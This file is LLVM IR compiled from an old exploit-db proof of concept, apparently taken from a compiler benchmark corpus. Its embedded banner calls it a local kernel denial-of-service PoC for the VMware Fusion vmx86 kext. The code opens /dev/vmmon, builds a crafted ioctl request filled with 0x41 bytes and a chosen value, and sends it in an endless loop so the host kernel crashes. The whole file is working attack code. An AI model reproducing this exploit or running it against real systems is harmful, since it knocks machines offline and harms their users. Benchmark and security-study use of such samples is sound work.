; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_10078.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_10078.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.ioctl_req = type { i32, %struct.ioctl_req* }
%struct.ioctl_req_buf = type { i32, %struct.ioctl_req_buf* }

@.str = private unnamed_addr constant [147 x i8] c"VMware Fusion <= 2.0.5 vmx86 kext local kernel denial of service PoC\0Aby: <mu-b@digit-labs.org>\0Ahttp://www.digit-labs.org/ -- Digit-Labs 2009!@$!\0A\0A\00", align 1
@.str.1 = private unnamed_addr constant [11 x i8] c"/dev/vmmon\00", align 1
@O_RDONLY = common dso_local global i32 0, align 4
@stderr = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [17 x i8] c"%s: open failed\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [14 x i8] c"* hitting...\0A\00", align 1
@VMX86_IOCTL = common dso_local global i32 0, align 4
@EXIT_SUCCESS = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca %struct.ioctl_req, align 8
  %7 = alloca %struct.ioctl_req_buf, align 8
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %10 = call i32 @printf(i8* getelementptr inbounds ([147 x i8], [147 x i8]* @.str, i64 0, i64 0))
  %11 = load i32, i32* @O_RDONLY, align 4
  %12 = call i32 @open(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.1, i64 0, i64 0), i32 %11)
  store i32 %12, i32* %8, align 4
  %13 = load i32, i32* %8, align 4
  %14 = icmp slt i32 %13, 0
  br i1 %14, label %15, label %23

15:                                               ; preds = %2
  %16 = load i32, i32* @stderr, align 4
  %17 = load i8**, i8*** %5, align 8
  %18 = getelementptr inbounds i8*, i8** %17, i64 0
  %19 = load i8*, i8** %18, align 8
  %20 = call i32 @fprintf(i32 %16, i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.2, i64 0, i64 0), i8* %19)
  %21 = load i32, i32* @EXIT_FAILURE, align 4
  %22 = call i32 @exit(i32 %21) #3
  unreachable

23:                                               ; preds = %2
  %24 = bitcast %struct.ioctl_req* %6 to %struct.ioctl_req_buf*
  %25 = call i32 @memset(%struct.ioctl_req_buf* %24, i32 0, i32 16)
  %26 = bitcast %struct.ioctl_req_buf* %7 to %struct.ioctl_req*
  %27 = getelementptr inbounds %struct.ioctl_req, %struct.ioctl_req* %6, i32 0, i32 1
  store %struct.ioctl_req* %26, %struct.ioctl_req** %27, align 8
  %28 = call i32 @memset(%struct.ioctl_req_buf* %7, i32 65, i32 16)
  %29 = getelementptr inbounds %struct.ioctl_req_buf, %struct.ioctl_req_buf* %7, i32 0, i32 0
  store i32 178956970, i32* %29, align 8
  %30 = call i32 @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.3, i64 0, i64 0))
  br label %31

31:                                               ; preds = %23, %31
  %32 = load i32, i32* %8, align 4
  %33 = load i32, i32* @VMX86_IOCTL, align 4
  %34 = bitcast %struct.ioctl_req* %6 to %struct.ioctl_req_buf*
  %35 = call i32 @ioctl(i32 %32, i32 %33, %struct.ioctl_req_buf* %34)
  store i32 %35, i32* %9, align 4
  br label %31
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @fprintf(i32, i8*, i8*) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @memset(%struct.ioctl_req_buf*, i32, i32) #1

declare dso_local i32 @ioctl(i32, i32, %struct.ioctl_req_buf*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
